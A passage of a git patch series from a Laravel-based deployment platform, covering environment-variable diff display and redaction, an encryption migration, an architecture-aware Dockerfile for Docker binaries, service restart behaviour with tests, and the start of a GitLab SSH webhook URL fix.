             'is_runtime' => $environmentVariable->is_runtime,
         ];
 
+        // Locked (is_shown_once) variables are always redacted and never store a value.
+        if ($locked) {
+            return $this->item(
+                key: (string) $environmentVariable->key,
+                label: (string) $environmentVariable->key,
+                value: $compareValue,
+                impact: $impact,
+                sensitive: true,
+                displayValue: $this->environmentDisplayValue($environmentVariable),
+            );
+        }
+
+        // Unlocked variables expose their value so owners/admins can see the change.
+        // The compare value is pre-hashed (identical formula to the locked branch) so
+        // change detection stays stable and never carries the raw value; members are
+        // redacted at render time in ConfigurationChecker; the column is encrypted at rest.
+        // The value and each scope flag are rendered as their own line and diffed by line,
+        // so a change to one or more attributes shows exactly what changed (one line each).
+        $value = (string) $environmentVariable->value;
+
         return $this->item(
             key: (string) $environmentVariable->key,
             label: (string) $environmentVariable->key,
-            value: $compareValue,
+            value: $this->sensitiveHash($this->normalizeValue($compareValue)),
             impact: $impact,
-            sensitive: true,
-            displayValue: $this->environmentDisplayValue($environmentVariable),
+            sensitive: false,
+            displayValue: $this->summarizeText($value),
+            displayFull: $this->environmentLines($environmentVariable),
+            diffMode: 'lines',
         );
     }
 
+    /**
+     * One line per attribute so the line diff surfaces exactly which value/flags changed.
+     */
+    private function environmentLines(EnvironmentVariable $environmentVariable): string
+    {
+        $lines = collect();
+
+        $value = (string) $environmentVariable->value;
+        if (filled($value)) {
+            $lines->push($value);
+        }
+
+        $lines->push('Available at build: '.($environmentVariable->is_buildtime ? 'enabled' : 'disabled'));
+        $lines->push('Available at runtime: '.($environmentVariable->is_runtime ? 'enabled' : 'disabled'));
+        $lines->push('Multiline: '.($environmentVariable->is_multiline ? 'enabled' : 'disabled'));
+        $lines->push('Literal: '.($environmentVariable->is_literal ? 'enabled' : 'disabled'));
+
+        return $lines->implode("\n");
+    }
+
     /**
      * @return array<string, mixed>
      */
-    private function item(string $key, string $label, mixed $value, string $impact, bool $sensitive = false, mixed $displayValue = null): array
+    private function item(string $key, string $label, mixed $value, string $impact, bool $sensitive = false, mixed $displayValue = null, ?string $displayFull = null, string $diffMode = 'default'): array
     {
         $normalizedValue = $this->normalizeValue($value);
 
@@ -264,21 +313,28 @@ private function item(string $key, string $label, mixed $value, string $impact,
             'label' => $label,
             'impact' => $impact,
             'sensitive' => $sensitive,
+            'diff_mode' => $diffMode,
             'compare_value' => $sensitive ? $this->sensitiveHash($normalizedValue) : $normalizedValue,
             'display_value' => $displayValue ?? $this->displayValue($normalizedValue),
+            'display_full' => $sensitive ? null : $this->expandableText($displayFull ?? $this->stringifyValue($normalizedValue)),
         ];
     }
 
     private function environmentDisplayValue(EnvironmentVariable $environmentVariable): string
     {
-        $flags = collect([
+        $flags = $this->environmentFlags($environmentVariable);
+
+        return $flags ? "Hidden ({$flags})" : 'Hidden';
+    }
+
+    private function environmentFlags(EnvironmentVariable $environmentVariable): string
+    {
+        return collect([
             $environmentVariable->is_buildtime ? 'build-time' : null,
             $environmentVariable->is_runtime ? 'runtime' : null,
             $environmentVariable->is_multiline ? 'multiline' : null,
             $environmentVariable->is_literal ? 'literal' : null,
         ])->filter()->implode(', ');
-
-        return $flags ? "Hidden ({$flags})" : 'Hidden';
     }
 
     private function sensitiveHash(mixed $value): string
@@ -320,6 +376,58 @@ private function displayValue(mixed $value): string
         return $this->summarizeText((string) $value);
     }
 
+    private function stringifyValue(mixed $value): ?string
+    {
+        if ($value === null || is_bool($value)) {
+            return null;
+        }
+
+        if (is_array($value)) {
+            return json_encode($value, JSON_THROW_ON_ERROR);
+        }
+
+        return (string) $value;
+    }
+
+    /**
+     * @return array<string, mixed>|null
+     */
+    private function decodedComposeDomains(): ?array
+    {
+        if (blank($this->application->docker_compose_domains)) {
+            return null;
+        }
+
+        $decoded = json_decode((string) $this->application->docker_compose_domains, true);
+
+        return is_array($decoded) ? $decoded : null;
+    }
+
+    private function composeDomainsText(): ?string
+    {
+        $decoded = $this->decodedComposeDomains();
+
+        if (blank($decoded)) {
+            return null;
+        }
+
+        return collect($decoded)
+            ->map(fn ($value, $service): string => $service.': '.(filled(data_get($value, 'domain')) ? data_get($value, 'domain') : '-'))
+            ->sort()
+            ->implode("\n");
+    }
+
+    private function decodeCustomLabels(?string $value): ?string
+    {
+        if (blank($value)) {
+            return null;
+        }
+
+        $decoded = base64_decode($value, true);
+
+        return $decoded === false ? $value : $decoded;
+    }
+
     private function summarizeText(?string $value): string
     {
         if (blank($value)) {
@@ -333,6 +441,6 @@ private function summarizeText(?string $value): string
             return str($value)->limit(80)." ({$lines} lines)";
         }
 
-        return str($value)->limit(120)->value();
+        return str($value)->limit(self::SINGLE_LINE_LIMIT)->value();
     }
 }
diff --git a/app/Services/DeploymentConfiguration/Concerns/SummarizesDiffText.php b/app/Services/DeploymentConfiguration/Concerns/SummarizesDiffText.php
new file mode 100644
index 000000000..6960a8f1b
--- /dev/null
+++ b/app/Services/DeploymentConfiguration/Concerns/SummarizesDiffText.php
@@ -0,0 +1,32 @@
+<?php
+
+namespace App\Services\DeploymentConfiguration\Concerns;
+
+trait SummarizesDiffText
+{
+    /**
+     * Maximum length of a single-line value before it is truncated/considered
+     * worth expanding. Kept as one constant so the snapshot summary and the
+     * differ's expand decision never drift apart.
+     */
+    private const SINGLE_LINE_LIMIT = 120;
+
+    /**
+     * Returns the value only when it is worth expanding (multi-line or longer
+     * than the single-line truncation limit). Otherwise null.
+     */
+    private function expandableText(?string $value): ?string
+    {
+        if (blank($value)) {
+            return null;
+        }
+
+        $value = trim((string) $value);
+
+        if (str_contains($value, "\n") || mb_strlen($value) > self::SINGLE_LINE_LIMIT) {
+            return $value;
+        }
+
+        return null;
+    }
+}
diff --git a/app/Services/DeploymentConfiguration/ConfigurationDiff.php b/app/Services/DeploymentConfiguration/ConfigurationDiff.php
index e8a206025..3f0477ba3 100644
--- a/app/Services/DeploymentConfiguration/ConfigurationDiff.php
+++ b/app/Services/DeploymentConfiguration/ConfigurationDiff.php
@@ -2,8 +2,6 @@
 
 namespace App\Services\DeploymentConfiguration;
 
-use Illuminate\Support\Collection;
-
 class ConfigurationDiff
 {
     /**
@@ -81,20 +79,6 @@ public function changes(): array
         return $this->changes;
     }
 
-    /**
-     * @return array<string, array{label: string, changes: array<int, array<string, mixed>>}>
-     */
-    public function groupedChanges(): array
-    {
-        return collect($this->changes)
-            ->groupBy('section')
-            ->map(fn (Collection $changes): array => [
-                'label' => (string) data_get($changes->first(), 'section_label', str((string) $changes->keys()->first())->headline()),
-                'changes' => $changes->values()->all(),
-            ])
-            ->all();
-    }
-
     /**
      * @return array{changed: bool, count: int, requires_build: bool, requires_redeploy: bool, legacy_fallback: bool, changes: array<int, array<string, mixed>>}
      */
diff --git a/app/Services/DeploymentConfiguration/ConfigurationDiffer.php b/app/Services/DeploymentConfiguration/ConfigurationDiffer.php
index b101b9d5b..e9707edbe 100644
--- a/app/Services/DeploymentConfiguration/ConfigurationDiffer.php
+++ b/app/Services/DeploymentConfiguration/ConfigurationDiffer.php
@@ -2,8 +2,21 @@
 
 namespace App\Services\DeploymentConfiguration;
 
+use App\Services\DeploymentConfiguration\Concerns\SummarizesDiffText;
+
 class ConfigurationDiffer
 {
+    use SummarizesDiffText;
+
+    /**
+     * Keys that must never be reported as changes. The generated docker_compose
+     * is re-rendered from git on every parse, so legacy snapshots that still
+     * contain it would otherwise flag a permanent change after it was dropped.
+     *
+     * @var array<int, string>
+     */
+    private const IGNORED_KEYS = ['build.docker_compose'];
+
     /**
      * @param  array<string, mixed>  $previousSnapshot
      * @param  array<string, mixed>  $currentSnapshot
@@ -16,6 +29,10 @@ public function diff(array $previousSnapshot, array $currentSnapshot): Configura
         $changes = [];
 
         foreach ($keys as $key) {
+            if (in_array($key, self::IGNORED_KEYS, true)) {
+                continue;
+            }
+
             $previous = $previousItems[$key] ?? null;
             $current = $currentItems[$key] ?? null;
 
@@ -27,6 +44,37 @@ public function diff(array $previousSnapshot, array $currentSnapshot): Configura
             $sensitive = (bool) data_get($item, 'sensitive', false);
             $type = $previous === null ? 'added' : ($current === null ? 'removed' : 'changed');
             $displaySummary = $sensitive && $type === 'changed' ? 'Changed' : null;
+            $diffMode = data_get($item, 'diff_mode', 'default');
+
+            $oldFull = null;
+            $newFull = null;
+
+            if ($sensitive) {
+                $oldDisplay = $previous === null ? '-' : '••••••••';
+                $newDisplay = $current === null ? '-' : '••••••••';
+            } elseif ($diffMode === 'lines' && $type === 'changed') {
+                [$oldDisplay, $newDisplay] = $this->changedLines(
+                    data_get($previous, 'display_full'),
+                    data_get($current, 'display_full'),
+                );
+
+                // No line-level difference (e.g. only reordering) — fall back to the summary.
+                if ($oldDisplay === '-' && $newDisplay === '-') {
+                    $oldDisplay = data_get($previous, 'display_value', '-');
+                    $newDisplay = data_get($current, 'display_value', '-');
+                }
+
+                // Expansion reveals the full changed lines, not the entire value.
+                $oldFull = $this->expandableText($oldDisplay);
+                $newFull = $this->expandableText($newDisplay);
+            } else {
+                $oldDisplay = data_get($previous, 'display_value', '-');
+                $newDisplay = data_get($current, 'display_value', '-');
+                $oldFull = data_get($previous, 'display_full');
+                $newFull = data_get($current, 'display_full');
+            }
+
+            $expandable = ! $sensitive && (filled($oldFull) || filled($newFull));
 
             $changes[] = [
                 'key' => $key,
@@ -37,14 +85,54 @@ public function diff(array $previousSnapshot, array $currentSnapshot): Configura
                 'impact' => data_get($item, 'impact', 'redeploy'),
                 'sensitive' => $sensitive,
                 'display_summary' => $displaySummary,
-                'old_display_value' => $sensitive ? ($previous === null ? '-' : '••••••••') : data_get($previous, 'display_value', '-'),
-                'new_display_value' => $sensitive ? ($current === null ? '-' : '••••••••') : data_get($current, 'display_value', '-'),
+                'old_display_value' => $oldDisplay,
+                'new_display_value' => $newDisplay,
+                'old_full_value' => $oldFull,
+                'new_full_value' => $newFull,
+                'expandable' => $expandable,
             ];
         }
 
         return ConfigurationDiff::fromChanges($changes);
     }
 
+    /**
+     * Reduce two multi-line values to only the lines that differ, so the modal
+     * shows just the changed container labels instead of the whole block.
+     *
+     * @return array{0: string, 1: string}
+     */
+    private function changedLines(?string $old, ?string $new): array
+    {
+        $oldLines = $this->textLines($old);
+        $newLines = $this->textLines($new);
+
+        $removed = array_values(array_diff($oldLines, $newLines));
+        $added = array_values(array_diff($newLines, $oldLines));
+
+        return [
+            $removed === [] ? '-' : implode("\n", $removed),
+            $added === [] ? '-' : implode("\n", $added),
+        ];
+    }
+
+    /**
+     * @return array<int, string>
+     */
+    private function textLines(?string $value): array
+    {
+        if (blank($value)) {
+            return [];
+        }
+
+        // Keep leading indentation (meaningful for YAML/compose), drop trailing whitespace.
+        return collect(preg_split('/\r\n|\r|\n/', (string) $value))
+            ->map(fn (string $line): string => rtrim($line))
+            ->filter(fn (string $line): bool => trim($line) !== '')
+            ->values()
+            ->all();
+    }
+
     /**
      * @param  array<string, mixed>  $snapshot
      * @return array<string, array<string, mixed>>
diff --git a/database/migrations/2026_05_29_000000_encrypt_application_deployment_configuration_columns.php b/database/migrations/2026_05_29_000000_encrypt_application_deployment_configuration_columns.php
new file mode 100644
index 000000000..123fd226d
--- /dev/null
+++ b/database/migrations/2026_05_29_000000_encrypt_application_deployment_configuration_columns.php
@@ -0,0 +1,23 @@
+<?php
+
+use Illuminate\Database\Migrations\Migration;
+use Illuminate\Support\Facades\DB;
+
+return new class extends Migration
+{
+    /**
+     * The configuration snapshot/diff now store an encrypted blob (not valid
+     * JSON), so the columns must hold arbitrary text instead of json.
+     */
+    public function up(): void
+    {
+        DB::statement('ALTER TABLE application_deployment_queues ALTER COLUMN configuration_snapshot TYPE text USING configuration_snapshot::text');
+        DB::statement('ALTER TABLE application_deployment_queues ALTER COLUMN configuration_diff TYPE text USING configuration_diff::text');
+    }
+
+    public function down(): void
+    {
+        DB::statement('ALTER TABLE application_deployment_queues ALTER COLUMN configuration_snapshot TYPE json USING configuration_snapshot::json');
+        DB::statement('ALTER TABLE application_deployment_queues ALTER COLUMN configuration_diff TYPE json USING configuration_diff::json');
+    }
+};
diff --git a/resources/views/components/deployment/configuration-diff.blade.php b/resources/views/components/deployment/configuration-diff.blade.php
index f01481057..6aac5af4d 100644
--- a/resources/views/components/deployment/configuration-diff.blade.php
+++ b/resources/views/components/deployment/configuration-diff.blade.php
@@ -4,7 +4,7 @@
 ])
 
 @php
-    $changes = collect(data_get($diff, 'changes', []))->filter(fn ($change) => data_get($change, 'key') !== 'domains.custom_labels')->values()->all();
+    $changes = collect(data_get($diff, 'changes', []))->values()->all();
     $count = count($changes);
     $requiresBuild = collect($changes)->contains(fn ($change) => data_get($change, 'impact') === 'build');
 @endphp
@@ -41,16 +41,63 @@
                             </div>
                             <div class="divide-y divide-neutral-300 dark:divide-coolgray-200">
                                 @foreach ($sectionChanges as $change)
+                                    @php
+                                        $changeKey = (string) data_get($change, 'key');
+                                        $expandable = data_get($change, 'expandable', false);
+                                        $oldDisplay = (string) data_get($change, 'old_display_value');
+                                        $newDisplay = (string) data_get($change, 'new_display_value');
+                                        $oldFull = data_get($change, 'old_full_value') ?? $oldDisplay;
+                                        $newFull = data_get($change, 'new_full_value') ?? $newDisplay;
+                                        $label = (string) data_get($change, 'label');
+                                        $labelTruncated = mb_strlen($label) > 20;
+                                        $rowExpandable = $expandable || $labelTruncated;
+                                    @endphp
                                     <div class="grid grid-cols-[12rem_1fr_1.5rem_1fr] items-start gap-2 px-3 py-1.5 text-neutral-700 dark:text-neutral-300">
-                                        <div class="shrink-0 font-medium text-black dark:text-white">
-                                            {{ data_get($change, 'label') }}
+                                        <div class="min-w-0 shrink-0 font-medium text-black dark:text-white">
+                                            @if ($rowExpandable)
+                                                <div class="break-words"
+                                                    :class="expandedRows['{{ $changeKey }}'] ? '' : 'truncate'"
+                                                    x-text="expandedRows['{{ $changeKey }}'] ? @js($label) : @js((string) str($label)->limit(20))"></div>
+                                            @else
+                                                {{ $label }}
+                                            @endif
                                         </div>
-                                        <div class="truncate text-red-700 dark:text-red-400/80" title="{{ data_get($change, 'old_display_value') }}">
-                                            {{ data_get($change, 'old_display_value') }}
+                                        <div class="min-w-0 text-red-700 dark:text-red-400/80">
+                                            @if ($expandable)
+                                                <div class="break-words"
+                                                    :class="expandedRows['{{ $changeKey }}'] ? 'whitespace-pre-wrap' : 'truncate'"
+                                                    x-text="expandedRows['{{ $changeKey }}'] ? @js($oldFull) : @js($oldDisplay)"></div>
+                                            @else
+                                                <div class="truncate">{{ $oldDisplay }}</div>
+                                            @endif
                                         </div>
                                         <div class="text-center text-neutral-500 dark:text-neutral-400">→</div>
-                                        <div class="truncate text-green-700 dark:text-green-500" title="{{ data_get($change, 'new_display_value') }}">
-                                            {{ data_get($change, 'new_display_value') }}
+                                        <div class="flex min-w-0 items-start gap-1 text-green-700 dark:text-green-500">
+                                            <div class="min-w-0 flex-1">
+                                                @if ($expandable)
+                                                    <div class="break-words"
+                                                        :class="expandedRows['{{ $changeKey }}'] ? 'whitespace-pre-wrap' : 'truncate'"
+                                                        x-text="expandedRows['{{ $changeKey }}'] ? @js($newFull) : @js($newDisplay)"></div>
+                                                @else
+                                                    <div class="truncate">{{ $newDisplay }}</div>
+                                                @endif
+                                            </div>
+                                            @if ($rowExpandable)
+                                                <button type="button"
+                                                    x-on:click="expandedRows['{{ $changeKey }}'] = ! expandedRows['{{ $changeKey }}']"
+                                                    :aria-expanded="!! expandedRows['{{ $changeKey }}']"
+                                                    title="Toggle full value"
+                                                    class="mt-0.5 flex h-5 w-5 shrink-0 items-center justify-center text-neutral-400 transition hover:text-black dark:hover:text-white">
+                                                    <svg x-show="! expandedRows['{{ $changeKey }}']" class="h-3.5 w-3.5"
+                                                        viewBox="0 0 20 20" fill="currentColor">
+                                                        <path fill-rule="evenodd" d="M13.28 7.78l3.22-3.22v2.69a.75.75 0 0 0 1.5 0v-4.5a.75.75 0 0 0-.75-.75h-4.5a.75.75 0 0 0 0 1.5h2.69l-3.22 3.22a.75.75 0 0 0 1.06 1.06ZM2 17.25v-4.5a.75.75 0 0 1 1.5 0v2.69l3.22-3.22a.75.75 0 0 1 1.06 1.06L4.56 16.5h2.69a.75.75 0 0 1 0 1.5h-4.5a.75.75 0 0 1-.75-.75Z" clip-rule="evenodd" />
+                                                    </svg>
+                                                    <svg x-show="expandedRows['{{ $changeKey }}']" x-cloak class="h-3.5 w-3.5"
+                                                        viewBox="0 0 20 20" fill="currentColor">
+                                                        <path fill-rule="evenodd" d="M3.28 2.22a.75.75 0 0 0-1.06 1.06L5.44 6.5H2.75a.75.75 0 0 0 0 1.5h4.5A.75.75 0 0 0 8 7.25v-4.5a.75.75 0 0 0-1.5 0v2.69L3.28 2.22ZM13.5 2.75a.75.75 0 0 0-1.5 0v4.5c0 .414.336.75.75.75h4.5a.75.75 0 0 0 0-1.5h-2.69l3.22-3.22a.75.75 0 0 0-1.06-1.06L13.5 5.44V2.75ZM3.28 17.78l3.22-3.22v2.69a.75.75 0 0 0 1.5 0v-4.5a.75.75 0 0 0-.75-.75h-4.5a.75.75 0 0 0 0 1.5h2.69l-3.22 3.22a.75.75 0 1 0 1.06 1.06ZM12 12.75c0-.414.336-.75.75-.75h4.5a.75.75 0 0 1 0 1.5h-2.69l3.22 3.22a.75.75 0 1 1-1.06 1.06l-3.22-3.22v2.69a.75.75 0 0 1-1.5 0v-4.5Z" clip-rule="evenodd" />
+                                                    </svg>
+                                                </button>
+                                            @endif
                                         </div>
                                     </div>
                                 @endforeach
diff --git a/resources/views/livewire/project/shared/configuration-checker.blade.php b/resources/views/livewire/project/shared/configuration-checker.blade.php
index 2c4440dfb..19974c587 100644
--- a/resources/views/livewire/project/shared/configuration-checker.blade.php
+++ b/resources/views/livewire/project/shared/configuration-checker.blade.php
@@ -1,6 +1,6 @@
 <div>
     @if ($isConfigurationChanged && !is_null($resource->config_hash) && !$resource->isExited())
-        <div x-data="{ configurationDiffModalOpen: false }">
+        <div x-data="{ configurationDiffModalOpen: false, expandedRows: {} }">
             <x-popup-small>
                 <x-slot:title>
                     The latest configuration has not been applied

From 9503d42ca68781b69ccb0940d5b47586739aa10c Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sat, 30 May 2026 13:52:48 +0530
Subject: [PATCH 48/90] fix(dev): testing host downloads wrong arch docker
 binaries on linux

---
 docker/testing-host/Dockerfile | 19 ++++++++++++++++---
 1 file changed, 16 insertions(+), 3 deletions(-)

diff --git a/docker/testing-host/Dockerfile b/docker/testing-host/Dockerfile
index fdad3cc41..43b16981a 100644
--- a/docker/testing-host/Dockerfile
+++ b/docker/testing-host/Dockerfile
@@ -20,9 +20,22 @@ ENV PATH="/host/usr/local/sbin:/host/usr/local/bin:/host/usr/sbin:/host/usr/bin:
 
 RUN apt update && apt -y install openssh-client openssh-server curl wget git jq jc
 RUN mkdir -p ~/.docker/cli-plugins
-RUN curl -sSL https://github.com/docker/buildx/releases/download/v${DOCKER_BUILDX_VERSION}/buildx-v${DOCKER_BUILDX_VERSION}.linux-amd64 -o ~/.docker/cli-plugins/docker-buildx
-RUN curl -sSL https://github.com/docker/compose/releases/download/v${DOCKER_COMPOSE_VERSION}/docker-compose-linux-x86_64 -o ~/.docker/cli-plugins/docker-compose
-RUN (curl -sSL https://download.docker.com/linux/static/stable/x86_64/docker-${DOCKER_VERSION}.tgz | tar -C /usr/bin/ --no-same-owner -xzv --strip-components=1 docker/docker)
+
+# Download architecture-matched Docker CLI, buildx, and compose binaries.
+# This image is published as a multi-arch manifest (amd64 + arm64), so the
+# downloaded binaries must match TARGETPLATFORM or they fail with "exec format error"
+# when the container runs on the other architecture.
+RUN if [ "${TARGETPLATFORM}" = "linux/amd64" ]; then \
+        curl -sSL https://github.com/docker/buildx/releases/download/v${DOCKER_BUILDX_VERSION}/buildx-v${DOCKER_BUILDX_VERSION}.linux-amd64 -o ~/.docker/cli-plugins/docker-buildx && \
+        curl -sSL https://github.com/docker/compose/releases/download/v${DOCKER_COMPOSE_VERSION}/docker-compose-linux-x86_64 -o ~/.docker/cli-plugins/docker-compose && \
+        (curl -sSL https://download.docker.com/linux/static/stable/x86_64/docker-${DOCKER_VERSION}.tgz | tar -C /usr/bin/ --no-same-owner -xzv --strip-components=1 docker/docker); \
+    elif [ "${TARGETPLATFORM}" = "linux/arm64" ]; then \
+        curl -sSL https://github.com/docker/buildx/releases/download/v${DOCKER_BUILDX_VERSION}/buildx-v${DOCKER_BUILDX_VERSION}.linux-arm64 -o ~/.docker/cli-plugins/docker-buildx && \
+        curl -sSL https://github.com/docker/compose/releases/download/v${DOCKER_COMPOSE_VERSION}/docker-compose-linux-aarch64 -o ~/.docker/cli-plugins/docker-compose && \
+        (curl -sSL https://download.docker.com/linux/static/stable/aarch64/docker-${DOCKER_VERSION}.tgz | tar -C /usr/bin/ --no-same-owner -xzv --strip-components=1 docker/docker); \
+    else \
+        echo "Unsupported TARGETPLATFORM: ${TARGETPLATFORM}" && exit 1; \
+    fi
 RUN chmod +x ~/.docker/cli-plugins/docker-compose /usr/bin/docker /root/.docker/cli-plugins/docker-buildx
 
 

From c9fcc0bc4444b71d4a096608c6ae28284b034c37 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sun, 31 May 2026 21:19:18 +0200
Subject: [PATCH 49/90] fix(service): defer stop when pulling latest images

Ensure restart actions flow through StartService so pull-latest restarts can
avoid stopping the service before image pulls. Also raise the changelog modal
above the desktop sidebar toggle.
---
 app/Actions/Service/RestartService.php        |  8 ++--
 app/Actions/Service/StartService.php          |  7 ++-
 package-lock.json                             |  8 +---
 .../livewire/settings-dropdown.blade.php      |  2 +-
 tests/Feature/SettingsDropdownTest.php        | 44 +++++++++++++++++++
 .../StartServicePullLatestRestartTest.php     | 36 +++++++++++++++
 6 files changed, 94 insertions(+), 11 deletions(-)
 create mode 100644 tests/Feature/SettingsDropdownTest.php
 create mode 100644 tests/Unit/Service/StartServicePullLatestRestartTest.php

diff --git a/app/Actions/Service/RestartService.php b/app/Actions/Service/RestartService.php
index d38ef54d6..6acd3b0a4 100644
--- a/app/Actions/Service/RestartService.php
+++ b/app/Actions/Service/RestartService.php
@@ -13,8 +13,10 @@ class RestartService
 
     public function handle(Service $service, bool $pullLatestImages)
     {
-        StopService::run($service);
-
-        return StartService::run($service, $pullLatestImages);
+        return StartService::run(
+            service: $service,
+            pullLatestImages: $pullLatestImages,
+            stopBeforeStart: true,
+        );
     }
 }
diff --git a/app/Actions/Service/StartService.php b/app/Actions/Service/StartService.php
index d3d99ff78..89817506d 100644
--- a/app/Actions/Service/StartService.php
+++ b/app/Actions/Service/StartService.php
@@ -19,7 +19,7 @@ public function configureJob(JobDecorator $job): void
     public function handle(Service $service, bool $pullLatestImages = false, bool $stopBeforeStart = false)
     {
         $service->parse();
-        if ($stopBeforeStart) {
+        if ($this->shouldStopBeforeStarting($pullLatestImages, $stopBeforeStart)) {
             StopService::run(service: $service, dockerCleanup: false);
         }
         $service->saveComposeConfigs();
@@ -53,4 +53,9 @@ public function handle(Service $service, bool $pullLatestImages = false, bool $s
 
         return remote_process($commands, $service->server, type_uuid: $service->uuid, callEventOnFinish: 'ServiceStatusChanged');
     }
+
+    private function shouldStopBeforeStarting(bool $pullLatestImages, bool $stopBeforeStart): bool
+    {
+        return $stopBeforeStart && ! $pullLatestImages;
+    }
 }
diff --git a/package-lock.json b/package-lock.json
index bcacecc8b..9d495c412 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -1261,8 +1261,7 @@
             "version": "5.5.0",
             "resolved": "https://registry.npmjs.org/@xterm/xterm/-/xterm-5.5.0.tgz",
             "integrity": "sha512-hqJHYaQb5OptNunnyAnkHyM8aCjZ1MEIDTQu1iIbbTD/xops91NB5yq1ZK/dC2JDbVWtF23zUtl9JE2NqwT87A==",
-            "license": "MIT",
-            "peer": true
+            "license": "MIT"
         },
         "node_modules/clsx": {
             "version": "2.1.1",
@@ -1752,7 +1751,6 @@
             "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==",
             "dev": true,
             "license": "MIT",
-            "peer": true,
             "engines": {
                 "node": ">=12"
             },
@@ -1946,8 +1944,7 @@
             "version": "4.1.18",
             "resolved": "https://registry.npmjs.org/tailwindcss/-/tailwindcss-4.1.18.tgz",
             "integrity": "sha512-4+Z+0yiYyEtUVCScyfHCxOYP06L5Ne+JiHhY2IjR2KWMIWhJOYZKLSGZaP5HkZ8+bY0cxfzwDE5uOmzFXyIwxw==",
-            "license": "MIT",
-            "peer": true
+            "license": "MIT"
         },
         "node_modules/tapable": {
             "version": "2.3.0",
@@ -1992,7 +1989,6 @@
             "integrity": "sha512-Bby3NOsna2jsjfLVOHKes8sGwgl4TT0E6vvpYgnAYDIF/tie7MRaFthmKuHx1NSXjiTueXH3do80FMQgvEktRg==",
             "dev": true,
             "license": "MIT",
-            "peer": true,
             "dependencies": {
                 "esbuild": "^0.27.0",
                 "fdir": "^6.5.0",
diff --git a/resources/views/livewire/settings-dropdown.blade.php b/resources/views/livewire/settings-dropdown.blade.php
index 0c0c000d5..d40d6778e 100644
--- a/resources/views/livewire/settings-dropdown.blade.php
+++ b/resources/views/livewire/settings-dropdown.blade.php
@@ -198,7 +198,7 @@ class="px-1 dropdown-item-no-padding flex items-center gap-2">
 
     <!-- What's New Modal -->
     @if ($showWhatsNewModal)
-        <div class="fixed inset-0 z-50 flex items-center justify-center py-6 px-4"
+        <div class="fixed inset-0 z-[60] flex items-center justify-center py-6 px-4"
             @keydown.escape.window="$wire.closeWhatsNewModal()">
             <!-- Background overlay -->
             <div class="absolute inset-0 w-full h-full bg-black/20 backdrop-blur-xs" wire:click="closeWhatsNewModal">
diff --git a/tests/Feature/SettingsDropdownTest.php b/tests/Feature/SettingsDropdownTest.php
new file mode 100644
index 000000000..db6c70111
--- /dev/null
+++ b/tests/Feature/SettingsDropdownTest.php
@@ -0,0 +1,44 @@
+<?php
+
+use App\Livewire\SettingsDropdown;
+use App\Models\User;
+use App\Services\ChangelogService;
+use Illuminate\Support\Carbon;
+use Illuminate\Support\Collection;
+use Illuminate\Support\Facades\Auth;
+use Livewire\Livewire;
+
+it('renders the changelog modal above the desktop sidebar toggle', function () {
+    $user = new User(['email' => 'test@example.com']);
+    $user->id = 1;
+
+    Auth::setUser($user);
+
+    app()->instance(ChangelogService::class, new class extends ChangelogService
+    {
+        public function getEntriesForUser(User $user): Collection
+        {
+            return collect([
+                (object) [
+                    'tag_name' => 'v1.0.0',
+                    'title' => 'Test Release',
+                    'content' => 'Release notes',
+                    'content_html' => '<p>Release notes</p>',
+                    'published_at' => Carbon::parse('2026-05-01'),
+                    'is_read' => false,
+                ],
+            ]);
+        }
+
+        public function getUnreadCountForUser(User $user): int
+        {
+            return 1;
+        }
+    });
+
+    Livewire::test(SettingsDropdown::class, ['trigger' => 'changelog-sidebar'])
+        ->call('openWhatsNewModal')
+        ->assertSee('Changelog')
+        ->assertSee('z-[60]', false)
+        ->assertSee('closeWhatsNewModal', false);
+});
diff --git a/tests/Unit/Service/StartServicePullLatestRestartTest.php b/tests/Unit/Service/StartServicePullLatestRestartTest.php
new file mode 100644
index 000000000..ce138ba65
--- /dev/null
+++ b/tests/Unit/Service/StartServicePullLatestRestartTest.php
@@ -0,0 +1,36 @@
+<?php
+
+use App\Actions\Service\RestartService;
+use App\Actions\Service\StartService;
+use App\Actions\Service\StopService;
+use App\Models\Service;
+
+it('does not stop a service before pulling latest images', function () {
+    $method = new ReflectionMethod(StartService::class, 'shouldStopBeforeStarting');
+
+    expect($method->invoke(new StartService, pullLatestImages: true, stopBeforeStart: true))->toBeFalse();
+});
+
+it('still stops a service before a regular restart', function () {
+    $method = new ReflectionMethod(StartService::class, 'shouldStopBeforeStarting');
+
+    expect($method->invoke(new StartService, pullLatestImages: false, stopBeforeStart: true))->toBeTrue()
+        ->and($method->invoke(new StartService, pullLatestImages: false, stopBeforeStart: false))->toBeFalse();
+});
+
+it('routes service restart actions through start service with deferred stop semantics', function () {
+    $service = Mockery::mock(Service::class);
+
+    $stopService = Mockery::mock(StopService::class);
+    $stopService->shouldNotReceive('handle');
+    app()->instance(StopService::class, $stopService);
+
+    $startService = Mockery::mock(StartService::class);
+    $startService->shouldReceive('handle')
+        ->once()
+        ->with($service, true, true)
+        ->andReturn('restart queued');
+    app()->instance(StartService::class, $startService);
+
+    expect(RestartService::run($service, true))->toBe('restart queued');
+});

From 34f15c106c003645bf8cc0b6ba428e589ff1cbe5 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sun, 31 May 2026 21:46:23 +0200
Subject: [PATCH 50/90] fix(webhook): match GitLab SSH repos with custom ports

Strip leading port segments from scp-style GitLab repository URLs so manual webhook matching compares the repository path consistently. Cover both ported and unported SSH URL forms.
---
 .../MatchesManualWebhookApplications.php      |  4 ++
 tests/Feature/Webhook/WebhookHmacTest.php     | 42 +++++++++++++++++++
 2 files changed, 46 insertions(+)

diff --git a/app/Http/Controllers/Webhook/Concerns/MatchesManualWebhookApplications.php b/app/Http/Controllers/Webhook/Concerns/MatchesManualWebhookApplications.php
index f1fd0c40f..0463790eb 100644
--- a/app/Http/Controllers/Webhook/Concerns/MatchesManualWebhookApplications.php
+++ b/app/Http/Controllers/Webhook/Concerns/MatchesManualWebhookApplications.php
@@ -81,6 +81,10 @@ protected function canonicalManualWebhookRepository(?string $gitRepository): ?st
             $path = data_get($parts, 'path');
         } elseif (Str::startsWith($gitRepository, 'git@') && str_contains($gitRepository, ':')) {
             $path = Str::after($gitRepository, ':');
